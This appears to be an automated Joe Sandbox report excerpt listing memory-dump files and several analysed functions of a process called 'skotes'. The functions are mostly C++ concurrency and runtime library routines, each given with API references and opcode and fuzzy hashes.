Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: 8a921db9fb9d858bfdbbe4a72528e9b93950afb211200d01a5ba37dc67042252
Instruction ID: c3cb96aea6ac069a18c58fdca2e54e01d0504b98a9a70bd3d17f4b76bfbe1c5e
Opcode Fuzzy Hash: 8a921db9fb9d858bfdbbe4a72528e9b93950afb211200d01a5ba37dc67042252
Instruction Fuzzy Hash: F571AB70901249AFDF15DF58C885BFEBBB2AF45304F044098EC416B263DB399D16DB61

Function 007A2832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 007A2876
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007A28DF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007A2913

Part of subcall function 007A07ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 007A080D

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 007A2993
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007A29DB

Part of subcall function 007A07C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007A07DE

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007A29EF
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 007A2A00
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 007A2A4D
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 007A2A7E

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
String ID:
API String ID: 1321587334-0
Opcode ID: b749f7e0a9a9d46ef6b3702da46f114651d40d3a275ac8560d8f2e85c6fa03e5
Instruction ID: 95326ce378fd4d7be664dcd3fc7b923542c770cc53fbd7ccc402d15cab80a885
Opcode Fuzzy Hash: b749f7e0a9a9d46ef6b3702da46f114651d40d3a275ac8560d8f2e85c6fa03e5
Instruction Fuzzy Hash: 7F81D471A0159ADBCB18DF6CD8D056DB7B1BF8E314B14822DE845EB242D73C6D42CB94

Function 007A69DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 007A6A1F
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 007A6A51
List.LIBCONCRT ref: 007A6A8C
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 007A6A9D
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 007A6AB9
List.LIBCONCRT ref: 007A6AF4
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 007A6B05
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007A6B20
List.LIBCONCRT ref: 007A6B5B
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 007A6B68

Part of subcall function 007A5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007A5EF7
Part of subcall function 007A5EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007A5F09

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Scheduling$Find$GroupNode::ProcessorRing::ScheduleSegmentVirtual$ListNext$AcquireConcurrency::details::_Lock::_ReaderWriteWriter
String ID:
API String ID: 3403738998-0
Opcode ID: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction ID: 3826a8b273af070170710a61db5f3c31324a09c8d3e4a109b900cb51ee49e862
Opcode Fuzzy Hash: 49fcf71f40cdee32d76cff0cfec7904b1821ee1dee631ce0987f33fef910e908
Instruction Fuzzy Hash: 5A515371A00209EFDF08DF64C495BED73A8BF89304F158169E915EB241DB78AE44CBD0

Function 007B52A5 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 007B53A0
type_info::operator==.LIBVCRUNTIME ref: 007B53C7
___TypeMatch.LIBVCRUNTIME ref: 007B54D3
IsInExceptionSpec.LIBVCRUNTIME ref: 007B55AE
CallUnexpected.LIBVCRUNTIME ref: 007B5650

Strings

csm, xrefs: 007B53FE
csm, xrefs: 007B534D
csm, xrefs: 007B52E0

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 4162181273-393685449
Opcode ID: eddc0219504d18c51e9b11eabaa38fae5d91a305ad299a655e183917c369c655
Instruction ID: 60be9eb9f2b8d30870a09d56a59cd727da6bacf3bfc4c823fa17d0b08779b502
Opcode Fuzzy Hash: eddc0219504d18c51e9b11eabaa38fae5d91a305ad299a655e183917c369c655
Instruction Fuzzy Hash: C2C17671800609EFCF25DFA4D884BEEBBB6BF18315F04415AF8056B202D779DA61CBA1

Function 007B4840 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 007B4877
___except_validate_context_record.LIBVCRUNTIME ref: 007B487F
_ValidateLocalCookies.LIBCMT ref: 007B4908
__IsNonwritableInCurrentImage.LIBCMT ref: 007B4933
_ValidateLocalCookies.LIBCMT ref: 007B4988

Strings

=L-t, xrefs: 007B48F2, 007B496F
csm, xrefs: 007B491D
S9{, xrefs: 007B4925, 007B492E, 007B493F

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: =L-t$S9{$csm
API String ID: 1170836740-4269351638
Opcode ID: 6506468e595e8c2bca49ec4fe70140e54e07660ca824484da5cc9eb3a83f898a
Instruction ID: bca36072fc9de476b5e836848e9715a131825a498a12e824e1af61c92a740ef0
Opcode Fuzzy Hash: 6506468e595e8c2bca49ec4fe70140e54e07660ca824484da5cc9eb3a83f898a
Instruction Fuzzy Hash: 0741D634A00258EFCF10DF68D889BDEBBB5BF45324F148155E8185B393D739AA12CB91

Function 00796E00 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00796ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00796F22
std::_Rethrow_future_exception.LIBCPMT ref: 00796F32
__Mtx_unlock.LIBCPMT ref: 00796FD5
__Mtx_unlock.LIBCPMT ref: 007970DB
__Mtx_unlock.LIBCPMT ref: 00797116

Strings

=L-t, xrefs: 00796E14, 00796F54, 00797024

Memory Dump Source

Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true

Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_780000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID: =L-t
API String ID: 1997747980-768041998
Opcode ID: 7fb75e1a8629d171114ea39e67fadc82753eeea45122b4b2979fa780528de1b5
Instruction ID: a54a6544a49d139ba75170f6bd2c6876fc9e3ec4d7456892ea93cc95887d32df
Opcode Fuzzy Hash: 7fb75e1a8629d171114ea39e67fadc82753eeea45122b4b2979fa780528de1b5
Instruction Fuzzy Hash: 97C1E171D04708DBDF25DFB4E949BAEBBF5AF44310F00452EE81697682EB39A904CB61

